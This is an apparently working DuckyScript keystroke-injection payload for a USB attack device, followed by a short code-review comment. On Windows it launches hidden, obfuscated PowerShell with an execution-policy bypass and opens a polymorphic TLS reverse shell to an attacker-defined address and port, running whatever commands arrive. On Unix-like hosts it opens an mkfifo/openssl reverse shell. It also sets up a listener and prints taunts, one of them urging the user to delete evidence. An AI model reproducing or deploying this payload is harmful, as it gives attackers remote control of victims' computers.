STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 4) THEN
STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
ELSE IF ($RANDOM_PS == 5) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 6) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
ELSE IF ($RANDOM_PS == 7) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 8) THEN
STRING powershell -NoPro -noninT -win h
ELSE IF ($RANDOM_PS == 9) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
ELSE IF ($RANDOM_PS == 2) THEN
STRING powershell.exe -NoP -nOni -W h
ELSE IF ($RANDOM_PS == 10) THEN
STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
ELSE IF ($RANDOM_PS == 11) THEN
STRING powershell -nopr -noninT -W HiddEn
ELSE IF ($RANDOM_PS == 12) THEN
STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
ELSE IF ($RANDOM_PS == 13) THEN
STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
ELSE IF ($RANDOM_PS == 14) THEN
STRING powershell -noproF -noni -W Hi
ELSE IF ($RANDOM_PS == 15) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
ELSE ($RANDOM_PS == 16) THEN
STRING powershell.exe -noP -nOnI -windo H
END_IF
IF_DEFINED_TRUE #EXECUTIONPOLICY
SPACE
IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS
ELSE IF (($RANDOM_PS % 5) == 0) THEN
STRING -exec bypass
ELSE IF (($RANDOM_PS % 7) == 0) THEN
STRING -exeC byPasS
ELSE IF (($RANDOM_PS % 10) == 0) THEN
STRING -exEcUtionPoL bYpaSs
ELSE IF (($RANDOM_PS % 12) == 0) THEN
STRING -exEcUtion bYPaSs
ELSE
STRING -eP BYPaSs
END_IF
END_IF_DEFINED
ENTER
DELAY #DELAY
END_FUNCTION
REM EXAMPLE USAGE AFTER EXTENSION
REM DELAY 2000
REM GUI r
REM DELAY 2000
REM Rolling_Powershell_Execution()
END_EXTENSION
REM Define the attackers IP, Port and Identifier
DEFINE #ADDRESS '0.0.0.0'
DEFINE #PORT 4444
DEFINE #IDENTIFIER Ducky
REM Automatic setup requires openssl!
DEFINE #SETUP FALSE
REM Automatic setup and start listener - Requires openssl!
IF_DEFINED #SETUP
IF ($_OS == #NOT_WINDOWS) THEN
DELAY 1500
STRINGLN echo "Setting up Infrastructre - Do not interact!"
DELAY 1000
STRINGLN openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && echo "Setup complete! Starting listener on Port #PORT " && openssl s_server -quiet -key key.pem -cert cert.pem -port #PORT
ELSE
DELAY 1500
GUI r
DELAY 1000
STRINGLN notepad.exe
DELAY 250
STRING Setup requires an unix based machine with openssl installed!
END_IF
ELSE_DEFINED
IF ($_OS == WINDOWS) THEN
REM Pseudo random variables for layer one polymorphism
VAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE
VAR $var_gibberish2 = $_RANDOM_LETTER_KEYCODE
VAR $var_gibberish3 = $_RANDOM_LOWER_LETTER_KEYCODE
VAR $var_gibberish4 = $_RANDOM_LETTER_KEYCODE
VAR $var_gibb3rish = $_RANDOM_NUMBER_KEYCODE
VAR $var_gIbberish5 = $_RANDOM_UPPER_LETTER_KEYCODE
VAR $var_gibberish6 = $_RANDOM_NUMBER_KEYCODE
VAR $var_gibBerish1 = $_RANDOM_NUMBER_KEYCODE
REM Layer two polymorphism
VAR $RANDOM_LAYER = $_RANDOM_INT
REM Polymorphism function
FUNCTION Polymorphism()
IF (($RANDOM_LAYER % 2) == 0) THEN
STRING $
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gIbberish5
ELSE IF (($RANDOM_LAYER % 6) == 0) THEN
STRING $
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gibberish
ELSE
STRING $
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish4
END_IF
END_FUNCTION
REM Polymorphism function
FUNCTION Polymorphism2()
IF (($RANDOM_LAYER % 6) == 0) THEN
STRING $
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gIbberish5
INJECT_VAR $var_gIbberish5
ELSE IF (($RANDOM_LAYER % 9) == 0) THEN
STRING $
INJECT_VAR $var_gibberish
INJECT_VAR $var_gIbberish5
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gibberish
ELSE
STRING $
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibberish3
INJECT_VAR $var_gibberish6
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gIbberish5
END_IF
END_FUNCTION
REM Polymorphism function
FUNCTION Polymorphism3()
IF (($RANDOM_LAYER % 1) == 0) THEN
STRING $
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gIbberish5
ELSE IF (($RANDOM_LAYER % 8) == 0) THEN
STRING $
INJECT_VAR $var_gibberish
INJECT_VAR $var_gIbberish5
INJECT_VAR $var_gibberish
ELSE
STRING $
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gibberish
INJECT_VAR $var_gIbberish5
END_IF
END_FUNCTION
REM Polymorphism function
FUNCTION Polymorphism4()
IF (($RANDOM_LAYER % 1) == 0) THEN
STRING $
INJECT_VAR $var_gIbberish5
INJECT_VAR $var_gibberish
INJECT_VAR $var_gibberish2
INJECT_VAR $var_gibb3rish
ELSE IF (($RANDOM_LAYER % 8) == 0) THEN
STRING $
INJECT_VAR $var_gibBerish1
INJECT_VAR $var_gibberish
INJECT_VAR $var_gIbberish5
INJECT_VAR $var_gibberish
ELSE
STRING $
INJECT_VAR $var_gibberish6
INJECT_VAR $var_gibberish4
INJECT_VAR $var_gibberish
INJECT_VAR $var_gIbberish5
END_IF
END_FUNCTION
REM Connection Message
FUNCTION Quack_Slogan()
IF (($RANDOM_LAYER % 2) == 0) THEN
STRING "[!] Quack you $env:USERNAME/$env:COMPUTERNAME! `n[?] Opsec Tip: Use environment variables.`n`n"
ELSE IF (($RANDOM_LAYER % 3) == 0) THEN
STRING "[!] $env:USERNAME/$env:COMPUTERNAME got found a flash drive... `n[?] Considere converting IPs to decimal (e.g. 127.0.0.1 = 2130706433)`n`n"
ELSE IF (($RANDOM_LAYER % 4) == 0) THEN
STRING "[!] $env:USERNAME/$env:COMPUTERNAME compromised by #IDENTIFIER `n[+] Ducks > D0lphins!`n`n"
ELSE IF (($RANDOM_LAYER % 6) == 0) THEN
STRING "[!] Quack Attack on $env:USERNAME/$env:COMPUTERNAME `n[+] Sometimes it is better to wait...Be patient!`n`n"
ELSE IF (($RANDOM_LAYER % 8) == 0) THEN
STRING "[!] Established remote access on $env:USERNAME/$env:COMPUTERNAME `n[?] Watch out for powershell -v 2!`n`n"
ELSE IF (($RANDOM_LAYER % 9) == 0) THEN
STRING "[!] $env:USERNAME/$env:COMPUTERNAME messed with the Duck `n[?] Remember to delete evidence.`n`n"
ELSE
STRING "[!] $env:USERNAME/$env:COMPUTERNAME says Quack! `n[+]...and then he waddled away...`n`n"
END_IF
END_FUNCTION
GUI r
DELAY 500
Rolling_Powershell_Execution()
DELAY 300
Polymorphism()
STRING =[Text.Encoding]::UTF8.GetBytes(
Quack_Slogan()
STRING );
Polymorphism2()
REM Section were Address & Port get reflected
STRING =New-Object Net.Sockets.TcpClient( #ADDRESS , #PORT );
STRING $s=
Polymorphism2()
STRING .GetStream();
STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]));
STRING $sSL.AuthenticateAsClient('madeby.0iphor13', $null, "Tls12", $false);
Polymorphism3()
STRING =new-object System.IO.StreamWriter($sSL);
STRING $sSL.write(
Polymorphism()
STRING ,0,
Polymorphism()
STRING .Length);
Polymorphism3()
STRING .Write('
REM Identifier
STRING #IDENTIFIER
STRING @PS '+(&('g'+'l'))+'> ');
Polymorphism3()
STRING .flush();[byte[]]
Polymorphism4()
STRING = 0..65535|%{0};while(($i=$sSL.Read(
Polymorphism4()
STRING , 0,
Polymorphism4()
STRING .Length)) -ne 0){$D=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(
Polymorphism4()
STRING ,0, $i);
STRING $Y=(iex $D | Out-String ) 2>&1;$X=$Y + '
REM Identifier
STRING #IDENTIFIER
STRING @PS ' + (Get-LoCatIon).Path + '> ';
STRING $Z=([text.encoding]::UTF8).GetBytes($X);$sSL.Write($Z,0,$Z.Length);
STRING $sSL.Flush()};exit
DELAY 250
ENTER
REM Indicator of successful execution
CAPSLOCK
DELAY 20
CAPSLOCK
ELSE
REM Executing reverse shell when inserted into non-windows box
REM Non-ideal solution for opening terminal (But should work for most unix distros)
DELAY 2000
INJECT_MOD COMMAND
DELAY 2000
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRINGLN which screen >/dev/null && which openssl >/dev/null && screen -md sh -c 'mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect #ADDRESS:#PORT > /tmp/s; rm /tmp/s'
DELAY 1000
STRINGLN exit
END_IF
END_IF_DEFINED
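Review bot: Line 2120 reads `ELSE ($RANDOM_PS == 16) THEN`, which is neither a plain `ELSE` nor an `ELSE IF`; given `$_RANDOM_MAX = 16` on line 2085 a bare `ELSE` appears to be what was meant. Line 2036 has a doubled keyword, `EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT`, and the second `ELSE IF ($RANDOM_PS == 2)` on line 2106 can never match because line 2090 already handles that value. The `({$True} -as [Net.Security.RemoteCertificateValidationCallback])` callback on line 2314 accepts any server certificate, so the `Encrypted` description on line 2034 and the README's encryption claim should be qualified as an encrypted but unauthenticated channel. Line 2030 says `Version 1.1` while the README added in this commit says `Version: 1.0`. This file section ends at the edge of the visible page, so any trailing lines were not reviewed.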